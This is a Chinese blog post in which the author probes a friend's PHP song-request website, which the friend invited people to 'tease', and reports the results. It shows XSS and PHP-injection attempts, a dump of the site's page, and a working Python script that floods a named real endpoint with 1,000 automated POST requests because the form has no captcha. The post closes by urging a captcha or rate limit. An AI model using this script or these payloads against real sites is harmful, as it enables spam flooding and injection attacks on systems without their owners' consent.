今天大师兄放出了自己用PHP写的KTV点歌系统,注明,欢迎调戏,于是乎就尝试了下。

地址就不上了,到现在没补漏洞,我可不想被大师兄K……

首先试试JavaScript脚本能否恶搞下

来个最基础的警告框吧!

<script type="text/javascript">

alert("我是黑客!!")

</script>

突然跳出

写这么长,作死么?小屌丝已存在!

无语的节奏

翻一番前人留下的痕迹

哔a_href_=_"#"哔我试试好用不哔/a哔
哔哔哔哔哔哔

哔php?_?哔
<php?_?>
中二的少年
九妹
我试点一下看看
王妃
sss
哔h1哔有人植入乱码哔/h1哔
小白杨
????
哔?phpinfo();?哔
<?phpinfo();?>
<php?phpinfo();?>
呵呵
哔h2哔sb荣哔/h2哔
<?phpinfo();while(1);?>

似乎进行了空格等敏感字符的过滤

看样子此路不通了---仔细思考下  嗯?没有验证码,啊哈,可以利用POST进行洪水攻击,然后刷爆页面。因为他是把数据库中的所有记录都输出在当前一个界面。所以完全可以让垃圾信息充斥。

<meta charset="gbk">

<p><h1> 王老菊点歌系统--记录下最想去ktv点的歌,方便日后点唱 </h1>

<font color="#f00">--嘛,取个这么作死的名字真的大丈夫?不管了,随你们调戏吧</font>

</p>

新不了情<br>kk->杀马特与王师傅<br>烟花易冷<br>~@天舞繁星(44638907*)__0:42:56_撸多了出幻觉<br>喀秋莎<br>新贵妃醉酒<br>洛天依<br>最美的单相思<br>提灯照河山<br>三少爷的剑<br>air-缘<br>ForbiddenAct<br>风居住的街道<br>临安初雨<br>潇洒走一回<br><<br>花与风的赞美诗<br>32<br>65456456<br>新不了情_kk->杀马特与王师傅_烟花易冷_~@天舞繁星(44638907*)__0:42:56_撸多了出幻觉_喀秋莎_新贵妃醉酒_洛天依_最美的单相思_提灯照河山_三少爷的剑_air-缘_ForbiddenAct_风居住的街道_临安初雨_潇洒走一回_<_花与风的赞美诗_32_65456456<br>蜀绣<br><script>document.write("<h1>hack_by_intptr<b><-左边作死@_@</b></h1>");</script><br><a_href_=_"#">我试试好用不</a><br>哔a_href_=_"#"哔我试试好用不哔/a哔<br>哔哔哔哔哔哔<br>爱<br>哔php?_?哔<br>&lt;php?_?&gt;<br>中二的少年<br>九妹<br>我试点一下看看<br>王妃<br>sss<br>哔h1哔有人植入乱码哔/h1哔<br>小白杨<br>????<br>哔?phpinfo();?哔<br>&lt;?phpinfo();?&gt;<br>&lt;php?phpinfo();?&gt;<br>呵呵<br>哔h2哔sb荣哔/h2哔<br>&lt;?phpinfo();while(1);?&gt;<br>哔<br>白色相簿<br>男人海洋<br>大海<br>dd<br>最天使<br>HackScripTest<br>DDos_it_by_CRoot<br>111111111<br>Attack_Start_By_CRoot<br>The_Attack_1_times<br>The_Attack_2_times<br>The_Attack_3_times<br>The_Attack_4_times<br>The_Attack_5_times<br><!--此处省去我用脚本刷出的N条信息-->

报告队长,调戏完毕!<br>调戏完了,留下一个歌<br>离歌-信乐团<br>有空加个验证码,亲<br><br><p><b>写这么长,作死么?小屌丝</b>已存在!</p>

<hr>

<form action="songs.php" method="post">

Input the song to add:<input type="text" name="newsong" />

<input type="submit" value="send"/>

</form>

看到这,不禁兴奋不已。于是脚本出炉。

#!/usr/bin/python

#===========================================

# Project name: DDosWysaid

# Description: NULL

# Author: CRoot

#===========================================

import urllib,urllib2

running = True

i = 1

number = 1000 # Attack number of times

url = 'http://kktv.wysaid.org/songs.php' # Attack the address

print 'The attack began!'

while running:

    String = 'The Attack '+str(i)+' times'

    parameters = {'newsong' : String}

    s='The Attack ' + str(i) + 'th times'

    print s

    data = urllib.urlencode(parameters)    # Use urllib to encode the parameters

    request = urllib2.Request(url, data)

    response = urllib2.urlopen(request)    # This request is sent in HTTP POST

    page = response.read(200000)

    if i == number:

        running = False

    else:

        i = i + 1

print 'Attack to complete!'

先这样吧,就调戏到这里。最后希望大师兄加个验证码或者POST次数限制啥的。否则会被严重爆菊的!!

关于post利用之Python的更多相关文章

  1. ecCodes 学习 利用ecCodes Python API对GRIB文件进行读写

    参考 https://www.ecmwf.int/assets/elearning/eccodes/eccodes2/story_html5.htmlhttps://confluence.ecmwf. ...

  2. 利用基于Python的Pelican打造一个自己的个人纯静态网站

    原文转载自「刘悦的技术博客」https://v3u.cn/a_id_100 其实呢这么多年以来我一直建议每个有技术追求的开发者都要有写技术博客记笔记的良好习惯,一来可以积累知识,二来可以帮助别人,三来 ...

  3. 【转】利用Boost.Python将C++代码封装为Python模块

    用Boost.Python将C++代码封装为Python模块 一.     基础篇 借助Boost.Python库可以将C/C++代码方便.快捷地移植到python模块当中,实现对python模块的扩 ...

  4. 利用Appium Python测试爱壁纸的登录和设置壁纸

    设置壁纸: #coding:utf-8 #Import the common package import os import unittest from appium import webdrive ...

  5. 利用pip批量更新python库

    如果python库比较旧,需要更新到最新版本,可以利用pip工具. DOS命令行下,输入pip -V查看pip版本,可以先把pip更新到新版本. 查看系统里过期的python库 pip list #列 ...

  6. 利用Python测量滴水湖的水面面积

    美丽的滴水湖   美丽的滴水湖坐落在上海的东南角,濒临东海,风景秀丽,安静舒适,是旅游.恋爱的绝佳去处.笔者有幸去过一回,对那儿的风土人情留下了深刻的印象,如果有机会,笔者还会多去几次!   滴水湖是 ...

  7. 利用python进行数据分析PDF高清完整版免费下载|百度云盘|Python基础教程免费电子书

    点击获取提取码:hi2j 内容简介 [名人推荐] "科学计算和数据分析社区已经等待这本书很多年了:大量具体的实践建议,以及大量综合应用方法.本书在未来几年里肯定会成为Python领域中技术计 ...

  8. 太方便了!利用Python对批量Pdf转Word

    在wps或者office里面可以将pdf转word,不过只能免费转前面5页,超过5页就需要会员.今天教大家一个Python办公小技巧:批量Pdf转Word ,这样可以自由想转多少页都可以. 思路:这里 ...

  9. 牛顿插值法——用Python进行数值计算

    拉格朗日插值法的最大毛病就是每次引入一个新的插值节点,基函数都要发生变化,这在一些实际生产环境中是不合适的,有时候会不断的有新的测量数据加入插值节点集, 因此,通过寻找n个插值节点构造的的插值函数与n ...

随机推荐

  1. linux下删除目录及其子目录下某种类型文件

    Linux下,如果想要删除目录及其子目录下某种类型文件,比如说所有的txt文件,则可以使用下面的命令: find . -name "*.txt" -type f -print -e ...

  2. 拾遗与填坑《深度探索C++对象模型》3.3节

    <深度探索C++对象模型>是一本好书,该书作者也是<C++ Primer>的作者,一位绝对的C++大师.诚然该书中也有多多少少的错误一直为人所诟病,但这仍然不妨碍称其为一本好书 ...

  3. AndroidStudio中导入SlidingMenu报错解决方案

    ----------------------------------------------------------------------------------------------[版权申明: ...

  4. 使用jQuery AJAX读取二进制数据

    READING BINARY DATA USING JQUERY AJAX http://www.henryalgus.com/reading-binary-files-using-jquery-aj ...

  5. Struts 1 之配置文件

    web.xml中配置Struts的入口Servlet--ActionServlet,ActionServlet不负责任何的业务处理,它只是查找Action名单,找到path属性与URL属性一致的Act ...

  6. EBS库存(INV)模块常用表

     select * from org_organization_definitions库存组织 select * from mtl_parameters组织参数 select * from mtl ...

  7. 【Netty源码学习】ChannelPipeline(一)

    ChannelPipeline类似于一个管道,管道中存放的是一系列对读取数据进行业务操作的ChannelHandler. 1.ChannelPipeline的结构图: 在之前的博客[Netty源码学习 ...

  8. Java中读取Excel功能实现_POI

    这里使用apache的poi进行读取excel 1,新建javaproject 项目:TestExcel 2,导入包 包下载地址:http://poi.apache.org/download.html ...

  9. Android性能优化之Listview(ViewHolder重用机制)

    相信大家在很多时候都会用到ListView这个控件,因为确实是用的很多很多,但是有木有遇到过当数据很多很多的时候,往下滑ListView时有时候会卡顿,这就需要我们来优化它了. ListView优化主 ...

  10. 深入剖析Tomcat会话机制

    1缓存机制 Tomcat默认将Session保存到内存中.但同时,Tomcat也提供了PersistentManager配合不同的Store实现的方式,使Session可以被保存到不同地方(Datab ...